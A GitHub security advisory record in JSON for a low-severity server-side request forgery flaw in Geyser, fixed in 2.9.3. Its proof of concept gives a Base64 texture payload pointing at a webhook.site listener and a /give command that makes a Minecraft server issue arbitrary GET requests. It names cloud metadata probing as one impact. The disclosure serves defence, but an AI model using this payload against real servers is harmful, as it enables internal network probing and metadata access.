{"id":"GHSA-xcfg-fcr5-gw9r","summary":"Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser","details":"### Summary\nA server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data.\nBy supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints.\nThis occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.\n\n### Details\nGeyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.\n\nWhen a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution.\nHowever, the URL contained in the textures.SKIN.url field is not sufficiently validated.\n\n### PoC\n\n1. **Setup Environment:**\n   - Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.\n   - Ensure you have a Bedrock client connected.\n\n2. **Prepare Listener:**\n   - Go to [webhook.site](https://webhook.site) and obtain a unique URL (e.g., `https://webhook.site/YOUR-UUID`).\n\n3. **Construct Payload:**\n   - Create a JSON payload pointing to your listener URL:\n     `{\"textures\":{\"SKIN\":{\"url\":\"https://webhook.site/YOUR-UUID\"}}}`\n   - Encode this JSON string to Base64.\n     *(You can use a terminal command: `echo -n '{\"textures\":{\"SKIN\":{\"url\":\"...\"}}}' | base64`)*\n\n4. **Execute Command:**\n   - Run the following command in the Bedrock Edition client:\n   `/give @p minecraft:player_head[minecraft:profile={properties:[{name:\"textures\",value:\"[PASTE_BASE64_HERE]\"}]}]`\n\n5. **Verify:**\n   - Check the webhook.site dashboard.\n   - You will see an **HTTP GET request originating from the Minecraft Server's IP address**, not the client's IP.\n\n### Impact\nThis vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.\n\n#### Affected Parties\n- Minecraft servers running Geyser\n- Server operators exposing internal or cloud metadata endpoints\n\n#### Potential Impacts\n- Internal network probing (e.g., intranet services, admin panels)\n- Cloud metadata access attempts (e.g., 169.254.169.254)\n- IP address disclosure of the Minecraft server\n- Abuse of the server as an HTTP request proxy\n\nAlthough the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:\n- Network mapping\n- Firewall bypass attempts\n- Cloud environment fingerprinting","aliases":["CVE-2026-42188"],"modified":"2026-05-05T20:18:42.532742Z","published":"2026-05-05T20:03:16Z","database_specific":{"severity":"LOW","github_reviewed":true,"github_reviewed_at":"2026-05-05T20:03:16Z","cwe_ids":["CWE-918"],"nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r"},{"type":"PACKAGE","url":"https://github.com/GeyserMC/Geyser"}],"affected":[{"package":{"name":"org.geysermc.geyser:core","ecosystem":"Maven","purl":"pkg:maven/org.geysermc.geyser/core"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.9.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-xcfg-fcr5-gw9r/GHSA-xcfg-fcr5-gw9r.json","last_known_affected_version_range":"\u003c= 2.9.2"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N"}]}